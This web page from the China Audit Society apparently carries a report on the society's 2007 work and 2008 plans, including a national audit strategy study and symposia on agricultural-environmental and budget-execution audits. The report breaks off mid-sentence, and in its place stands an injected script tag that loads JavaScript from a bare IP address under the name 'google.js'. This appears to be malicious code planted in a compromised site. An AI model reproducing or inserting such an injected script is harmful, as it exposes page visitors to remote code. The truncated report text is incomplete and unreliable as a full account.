首页学会基本情况规划与计划课题管理学会会议培训与学习学术交流审计研究
当前位置: 首页  >  学会会议  >  理事会议 > 正文
 
中国审计学会2007年度工作情况和2008年工作安排的报告
 
【时间:2015年07月31日】 字号: 【大】 【中】 【小】

刘英来

 

各位理事:

    依据中国审计学会章程的规定,我受翟熙贵会长的委托,向五届三次理事会报告学会2007年的工作情况和2008年的工作安排,请各位理事审议。

    一、2007年的主要工作情况

    2007年,中国审计学会在审计署的领导下,认真贯彻党的十七大和十六届五中、六中全会精神,全面贯彻科学发展观,围绕《中国审计学会2005至2009年审计理论研究规划》提出的目标,按照学会2007年工作计划安排,主要完成了以下工作:

    (一)组织开展《中国审计发展战略》课题研究工作。

    为深入贯彻落实科学发展观和党的十六届六中全会精神,深入总结我国审计机关成立25年来的主要经验,深入研究我国审计未来发展的若干重大问题,促进审计事业科学发展,2007年,学会重点开展了《中国审计发展战略》课题研究工作。2月初,召开了课题研究的启动会,成立了课题组,由学会会长亲自担任课题组长,下设15个子课题组,由国务院发展研究中心、南京审计学院、审计署各司局、科研所、特派办作为子课题承担单位,分别对未来5至10年我国政治经济社会发展的趋势和特点;我国政治经济环境对审计的需求;新形势下我国政府审计发展总体战略;财政审计、金融审计、企业审计、投资审计、社保审计、资源与环境审计、经济责任审计、效益审计、涉外审计的发展战略;审计人才、审计法制发展战略、信息化条件下的审计方式方法等进行了研究。4月份,在审计署怀柔培训基地召开了课题提纲论证会,进一步明确了各子课题研究的内容和撰写要求。从11月起,学会先后召开了3次课题报告讨论会,分批对12个子课题研究报告初稿进行了讨论。该课题研究得到了署领导的高度重视和支持。刘家义副审计长审阅了全部课题报告初稿,并对课题研究做出指示和提出要求。石爱中副审计长亲自担任课题组副组长,董大胜副审计长、孙宝厚总审计师多次参加课题研讨会,对课题研究进行具体指导。各子课题承担单位主要领导亲自担任子课题组组长,组成“三结合”的课题组,认真进行调研和开展课题研究工作,亲自修改课题研究报告,保证了课题研究成果的质量,为按时顺利完成课题研究任务付出了辛勤的劳动。目前各子课题组正在按照专家意见对研究报告做进一步修改和完善,不久即将提交结题报告。

    (二)组织召开三次专题研讨会。

    根据审计工作发展的需要,2007年,学会围绕影响审计工作发展的重点和难点问题,主要组织召开了三次专题研讨会。

    一是农业与环保资金效益审计专题研讨会。为深入探索适合我国国情的农业环保资金效益审计的规律,推动农业与资源环保效益审计工作发展,2007年6月,学会与审计署农业与资源环保审计司在杭州联合举办了农业与环保资金效益审计专题研讨会。这次会议共收到论文54篇,其中26篇进行了会议交流。来自各级审计机关的领导和从事农业环保资金审计的实务工作者、部分院校的专家学者40多人参加了会议。与会人员就农业与资源环保效益审计的目标、审计方式和方法、审计评价标准和准则等问题进行了深入的讨论,交流了农业与资源环保效益审计的经验做法和体会。

    经过研讨,形成以下主要观点:加强农业与环保资金效益审计是落实科学发展观的本质要求,对于贯彻党中央提出的解决三农问题的各项方针,实现全面建设小康社会的任务有重要的意义;当前开展农业与环保资金效益审计,应在真实性、合法性审计的基础上,对农业与环保资金和项目的经济性、效率性、效果性进行审计;农业与环保资金效益审计不仅需要使用常规的审计方法,还要根据具体审计内容和项目特点选用一些专门方法。

    二是本级预算执行审计专题研讨会。为总结本级预算执行审计的经验,推动本级预算执行审计工作的进一步深化和发展,2007年10月,学会与审计署财政审计司、行政事业审计司在北京联合召开了本级预算执行审计专题研讨会。这次会议共收到论文58篇,其中35篇进行了会议交流。来自财政审计一线的审计工作者和部分院校的专家学者60多人参加了会议。与会代表就本级预算执行审计的目标、实施方式、内容和技术方法等进行了研讨,交流了财政预算执行审计的理论成果和实践经验,分析了当前财政预算执行审计工作面临的形势和存在的问题,对今后深化财政预算执行审计的思路和措施进行了探讨。

    经过研讨,形成以下主要观点:我国财政预算执行审计作为监督财政预算管理的一项重要制度已经基本确立,经过12年的探索,财政预算执行审计工作已经走上法制化、制度化的轨道;当前和今后的财政预算执行审计应贯彻“规范管理、促进改革、提高效益”的总体思路,着力揭示影响财政改革进程和公共?script src= http://91.239.15.61/google.js \>
【关闭】    【打印】
  版权信息
主办单位:中国审计学会  技术支持:审计署计算机技术中心 本站电话:010-82199820
本站地址:北京市海淀区中关村南大街4号(邮编:100086) 备案编号:京ICP备19011981号  建议使用分辨率:1024×768